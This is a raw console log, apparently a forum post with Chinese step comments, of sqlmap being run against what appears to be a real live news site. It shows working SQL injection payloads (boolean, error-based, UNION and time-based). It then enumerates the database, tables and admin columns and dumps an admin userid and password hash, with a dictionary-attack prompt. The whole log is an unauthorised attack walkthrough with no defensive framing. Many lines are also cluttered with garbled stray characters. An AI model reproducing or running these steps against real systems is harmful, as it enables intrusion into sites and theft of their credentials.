D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* c" P! A9 F/ h% d3 z; T. ?ms "Mysql" --current-user /* 注解:获取当前用户名称
8 U( |3 b9 ~6 m8 O: {3 | sqlmap/0.9 - automatic SQL injection and database takeover tool
. C+ I; E: M) l+ k3 s/ [ http://sqlmap.sourceforge.net starting at: 16:53:54
& @% e! q. \$ p4 b7 l& b% S" ]* s0 m[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" \" j# ]" B) ]
session file" q: q1 N* U1 j6 e
[16:53:54] [INFO] resuming injection data from session file
' e) S5 X; c* V6 i[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 c; K0 j7 }5 [, C[16:53:54] [INFO] testing connection to the target url6 L8 o4 Y& U+ J* J. H+ h
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ a, `4 E9 { I7 l% psts:
8 L6 Y, x* F, f: v0 B) f& J' { \---
' _6 k) j4 U* |+ W- R" I1 m* CPlace: GET
4 o& ?- C i1 Z7 kParameter: id* @: X L$ s' j0 e [. A! K8 j F
Type: boolean-based blind \9 Z- i8 I2 [
Title: AND boolean-based blind - WHERE or HAVING clause! |0 T( a8 C, _' d& S! N
Payload: id=276 AND 799=799% ` @: Q4 c! ^# @; z/ O% m
Type: error-based" Y9 J" e4 e0 @6 J+ h6 c
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 k( {: ~+ v# ` Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
s; b& ~2 `3 H; S k {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! w3 q. Q7 H# |" \0 R( _) H! n),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# h# B1 _! u. o9 D+ H Type: UNION query7 m- y/ B- O# I6 d) C
Title: MySQL UNION query (NULL) - 1 to 10 columns
! k; K% \' P+ S7 f6 x Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 Q2 ?& L$ ?+ e2 [: _& a; V
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, N+ y9 V# G N% W9 i# bCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
3 K8 E5 x3 i( p8 s Type: AND/OR time-based blind
- o5 K6 r0 {7 ? Title: MySQL > 5.0.11 AND time-based blind$ m4 p: }8 U: `5 h0 M! e7 ?3 ^
Payload: id=276 AND SLEEP(5)) L( Q, g B5 C( N& w( ~3 d5 v5 X
---% D: J! ^) v* B5 ~
[16:53:55] [INFO] the back-end DBMS is MySQL
z) u. T, o6 ^7 U1 }7 K" hweb server operating system: Windows
. k1 ~0 h( ~! f+ e$ ^web application technology: Apache 2.2.11, PHP 5.3.0
( C( d$ t0 O$ X. z' \5 r1 l- Dback-end DBMS: MySQL 5.0
/ U' G% c4 F; X[16:53:55] [INFO] fetching current user* q/ B8 A3 q& Y5 l7 l
current user: 'root@localhost'
; c9 d+ S# t# g4 o3 l& V- V- Q3 l& @[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
6 {; T, H# V* g8 [tput\www.wepost.com.hk' shutting down at: 16:53:58
* A0 E3 p+ [4 q% {0 Q3 v$ L( S, D3 q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# ?$ z# c& S* l) Y4 C- kms "Mysql" --current-db /*当前数据库
. [) A6 w$ ~; W$ C1 `9 d9 M sqlmap/0.9 - automatic SQL injection and database takeover tool5 @. W ]* H) f9 y, r
http://sqlmap.sourceforge.net starting at: 16:54:16' X# |" d- L7 O' A
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. h G0 L" J) S* b8 X session file9 L6 B4 f& f7 D0 F7 o: {+ n
[16:54:16] [INFO] resuming injection data from session file/ \( M# T$ N* \* r/ D {. c0 S" d* S
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
' U" g* t( E9 U; u1 u& M[16:54:16] [INFO] testing connection to the target url
~3 N9 D! I$ z6 ~: d( Tsqlmap identified the following injection points with a total of 0 HTTP(s) reque' e) _$ U2 J) \
sts:
: g7 U7 O2 M( t; p8 H. G9 ^- q---
8 H( E. Y: M* c8 YPlace: GET. s, o: {( F @' m( f; o
Parameter: id
( e, k t8 u5 |4 e& L' K! r Type: boolean-based blind
" k! O% Y+ v* u( r+ X Title: AND boolean-based blind - WHERE or HAVING clause
+ ~7 ~, D5 @9 a Payload: id=276 AND 799=799
A- `5 S/ v. P# G Type: error-based' c" o- I% i8 T/ P6 b; B
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 |. \5 ?9 v j4 i, P
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( Z* [8 t: H% l! }120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,588 h# |1 C- f/ B0 |# T. f% y3 i
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
* O. Q5 V. ^; u! h2 r' d Type: UNION query
, k. f9 m6 V, `* Z5 B Title: MySQL UNION query (NULL) - 1 to 10 columns/ B# O8 k4 }: h( K V
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% `& u' {0 s" \8 t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( v% m3 y8 E0 Y3 l' ACHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. w; K$ {! O2 l6 I4 B
Type: AND/OR time-based blind& ?% @: n- N7 F3 F, j. V
Title: MySQL > 5.0.11 AND time-based blind% h: b9 {; t* s6 ?7 d4 j
Payload: id=276 AND SLEEP(5)# c4 _) A) o; O
---9 o7 D" J* d4 p0 o+ l
[16:54:17] [INFO] the back-end DBMS is MySQL
" R# u$ k) B6 D7 g& Iweb server operating system: Windows
1 g, u5 y" ?1 T/ mweb application technology: Apache 2.2.11, PHP 5.3.0
! a) q: I8 Z! ?: Z2 Uback-end DBMS: MySQL 5.0
8 G% K; ^4 F, A9 I[16:54:17] [INFO] fetching current database# I4 o9 w9 ~; a+ N
current database: 'wepost'5 P" L! r1 Y. r. o) L+ P1 V
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
* W+ S! f' S H! B$ r4 q" s Q- T8 Itput\www.wepost.com.hk' shutting down at: 16:54:188 _6 G9 y7 Z7 f8 L }* X' P0 V
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 T$ B6 ^: x) @. t3 P7 C; I7 Z# wms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
' a2 J% q, w, K% y: S2 V1 Z sqlmap/0.9 - automatic SQL injection and database takeover tool' o5 G, i( \; J$ b3 N+ `4 V
http://sqlmap.sourceforge.net starting at: 16:55:25
: I( {9 o; _2 O+ p+ p3 R% G* j[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
( a% ]+ n1 D8 f }4 @ session file
" p6 x3 {; O# F- r/ [[16:55:25] [INFO] resuming injection data from session file
2 ?' ?4 v5 {1 d8 G# b* q/ _[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 |' U3 s/ r6 l' G t" s[16:55:25] [INFO] testing connection to the target url* W' W7 C, ^ C& a: T- J+ E" |* w
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
& L% x! [: d' W7 `1 p3 [3 msts:+ m7 v+ Q. d8 G
---4 w6 j1 f$ ], x* }, q" s, d. c
Place: GET! A/ }8 S) n! q5 ?
Parameter: id
$ u9 n8 O8 q+ p: N z4 q# ? Type: boolean-based blind. ?0 B; B% z4 ^3 v
Title: AND boolean-based blind - WHERE or HAVING clause
6 R b8 x1 B& X Payload: id=276 AND 799=799 i) v2 v9 s; w" B0 R
Type: error-based
; c7 z" B% l! b Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 o& D# `+ y) ~# m4 u. l, Z& r2 x. z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 l7 z* w8 L1 B5 g- j0 H120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 j$ d$ b3 K, D! p
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" ]: J" s: f. P6 B- ^8 V
Type: UNION query* m$ J* T! K+ q0 F* K# u
Title: MySQL UNION query (NULL) - 1 to 10 columns) [' I' X ?6 V" @
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# M3 b/ d& e2 N" X& V" V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( a% J/ d+ O/ u8 U X0 |4 w
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" u5 L2 H! O8 J8 V; r1 d$ }
Type: AND/OR time-based blind) h0 j4 R; l$ O/ a6 c
Title: MySQL > 5.0.11 AND time-based blind1 H5 p ^$ q& {
Payload: id=276 AND SLEEP(5)
2 @1 ?5 n) ^" Y& U! n# U---2 } C, ?3 H) u' E
[16:55:26] [INFO] the back-end DBMS is MySQL+ m; N1 t! u M2 R* k* Y) S
web server operating system: Windows
! c- W5 ^7 N7 r: t% y: Hweb application technology: Apache 2.2.11, PHP 5.3.0
- d0 T! d; N1 l* o9 oback-end DBMS: MySQL 5.03 [" S. g: m" a8 x
[16:55:26] [INFO] fetching tables for database 'wepost'0 R, N1 G6 C( w
[16:55:27] [INFO] the SQL query used returns 6 entries
5 s7 j1 S- m N. lDatabase: wepost
6 q: j: j F' J, f1 t9 H7 w" t[6 tables]
- r! O, g9 D, W; }; y) k+-------------+1 e. d5 L- }; X8 H" a% p9 o/ ]. y
| admin |
/ g9 o" X1 a$ z7 o7 A2 _| article |
" |) r0 h) S6 b% j( o| contributor |
* O. m+ ~, Y4 V5 || idea |
- u3 g+ A) `8 l% i6 J' J2 Q| image |
. c3 Y9 n' _+ O# p. y( X% r; W| issue |
h2 a# U1 `. x" Z# S+-------------+
5 E+ h y4 G% u6 a4 ^9 ?1 v[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
4 K3 I. d5 j" M: _& L) ctput\www.wepost.com.hk' shutting down at: 16:55:33; M {2 J l1 L9 K
. T( j* O Y. @) o4 q6 @5 _5 ^/ ]- d
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ }3 J! L9 G& t! F: @# o; v5 ^) w
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名7 J! G+ ~* d) g; u8 T* P
sqlmap/0.9 - automatic SQL injection and database takeover tool
2 @" d9 p+ y G! y1 O, b. E$ V http://sqlmap.sourceforge.net starting at: 16:56:06' E) U. V. y/ D' ]$ u
sqlmap identified the following injection points with a total of 0 HTTP(s) reque' [3 M' D/ `8 w" s0 d3 L
sts:
' [4 _" i8 }, T* d1 H1 P" I; l---* W$ b% G: M M$ a# O( F( T
Place: GET
5 {+ v x! k$ N8 ^, C+ W5 \4 `Parameter: id. b" ^$ C) |8 O* a2 i: Q6 R# \( N( `4 i
Type: boolean-based blind. S- K. i% @- d1 J0 B, F5 O
Title: AND boolean-based blind - WHERE or HAVING clause
4 b9 K+ E& q* w! `6 C Payload: id=276 AND 799=799
9 j1 _: `" C$ ?$ U Type: error-based+ n O e' w3 i: p* K
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 K8 ?, L2 |1 ~; N5 O Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( D# I [/ P0 b: k. Y2 [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58- F w/ j7 _6 g; R! p, e2 y3 J
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% N1 L r: q f) p \8 N
Type: UNION query' q) W9 `8 |3 T& N) v
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 u0 G: V6 y/ {7 |, d0 J Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 E2 d" P3 ]4 Q5 C
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 F) w* M8 F) Z4 P ?' e4 a
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# h! f$ {7 f8 X7 G3 M' B4 ?% i Type: AND/OR time-based blind% J9 T7 f) r/ _7 r3 ^& Q# d7 ]. K9 T) Y
Title: MySQL > 5.0.11 AND time-based blind
' Q, w; v. Y2 W: V6 R" ` Payload: id=276 AND SLEEP(5)$ o2 u- [1 @7 u ~: K
---1 H% x1 H& W6 J7 _/ R
web server operating system: Windows
/ S8 N9 P7 C" s1 D/ N( r) vweb application technology: Apache 2.2.11, PHP 5.3.0
" d" k$ C" w) k: B" J5 Cback-end DBMS: MySQL 5.0
2 }1 {2 J4 \% h6 V. A[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
& E5 N9 c( _" M8 `; ission': wepost, wepost
; \$ K, I/ \ Z$ dDatabase: wepost& |% Z5 P6 I9 _7 _
Table: admin) J/ i8 x, U0 k9 {# u# Y
[4 columns]: e0 Q: |: ^) }$ q0 o5 |) C
+----------+-------------+
% h5 j7 C- q. I, h @$ O* V0 ?| Column | Type |
5 M/ }9 T' l+ ]! a( z+----------+-------------+
( V# s& e: k+ Y* ^; O, T* a| id | int(11) |
( s" f k" |) A* l2 d$ V1 X| password | varchar(32) |9 c J$ ~- q7 a9 n8 k5 B% V/ K) L. m7 ~
| type | varchar(10) |! X# e' z& I5 _8 f6 u9 k
| userid | varchar(20) |8 W1 n, z5 P' n: o2 ]# F
+----------+-------------+7 _/ R8 I) G# {5 b
shutting down at: 16:56:19
' t! S; p3 ~7 q+ ]8 H
: g& b6 H! R* y, t G- q0 [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) r3 K: B! J' L5 h' K9 Vms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
5 }) _/ K8 a; F% r6 p sqlmap/0.9 - automatic SQL injection and database takeover tool
; ]# L0 l& X% A2 I http://sqlmap.sourceforge.net starting at: 16:57:14
' y w8 b2 ^# r6 `) g+ i9 S. `sqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ @! R5 D& Y1 ?# D7 G( nsts:
9 x5 A$ ?* k1 t7 H* \) p ?---5 ^" b. I4 p2 m$ R
Place: GET& u1 _: g, K9 K# M8 _
Parameter: id
+ d, {7 H3 U0 E$ r) s9 m: ~, K Type: boolean-based blind# Q' E7 g* ~) N, u7 f6 ~/ [2 W0 l5 z
Title: AND boolean-based blind - WHERE or HAVING clause
4 _. y# @* [7 r4 l8 O Payload: id=276 AND 799=799: c5 h* X* N, c
Type: error-based
$ X' y' {" O3 J; p) N Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 ?- ~ C8 b1 u" p: @- c3 z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( L: h3 v+ q, ~; e3 @4 H! p' f6 f5 G
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 R7 |+ c. p$ h0 N
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 y$ U: i7 T# W1 r
Type: UNION query
+ f! i' C* Y9 P! X* |, A Title: MySQL UNION query (NULL) - 1 to 10 columns
4 x2 i8 Q/ z5 Y: H1 _ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 f) [# J+ a' Q" v6 h8 }5 X
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 [" f+ n$ b( {" ^" n3 z
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. ^# E* k# Q" f7 T: K
Type: AND/OR time-based blind A8 s1 m: m" H
Title: MySQL > 5.0.11 AND time-based blind
: y1 `# P# y4 C$ N+ u, o1 j& f( d6 { Payload: id=276 AND SLEEP(5)
! \; ?" j5 ^1 l( t! v4 b---! o0 D$ c- ]1 m: Q7 c, l2 u
web server operating system: Windows
9 p! W$ P% h# B' `web application technology: Apache 2.2.11, PHP 5.3.03 ?% x6 G! |, Y' m
back-end DBMS: MySQL 5.0! G8 u+ g6 Z Q' }8 c
recognized possible password hash values. do you want to use dictionary attack o
6 s, c' @; W% N" Y; q, } Rn retrieved table items? [Y/n/q] y9 t' S7 \1 u Z& R2 {8 x u
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
' h" P2 Z, u0 a: [do you want to use common password suffixes? (slow!) [y/N] y0 u& z6 ]8 J! o) I4 F
Database: wepost
( X( g6 l0 K9 h: h" Q/ s% BTable: admin# u* G! W9 s/ }0 j7 v- r, u+ c8 R4 c
[1 entry]
( `/ J5 V4 W* N5 A9 Z+----------------------------------+------------+
0 {1 D) u4 E% p" F9 v. p% W| password | userid |. d# V4 \+ q' N$ o7 s7 A* `
+----------------------------------+------------+
h! h7 ^" h( D8 x| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
1 h9 V: p/ Y" [; R+----------------------------------+------------+
4 t% g. }/ G' r shutting down at: 16:58:14
T$ ?% G! |5 V$ _% K! O6 i, K2 i
( ~7 c/ q0 z' n! b+ FD:\Python27\sqlmap> |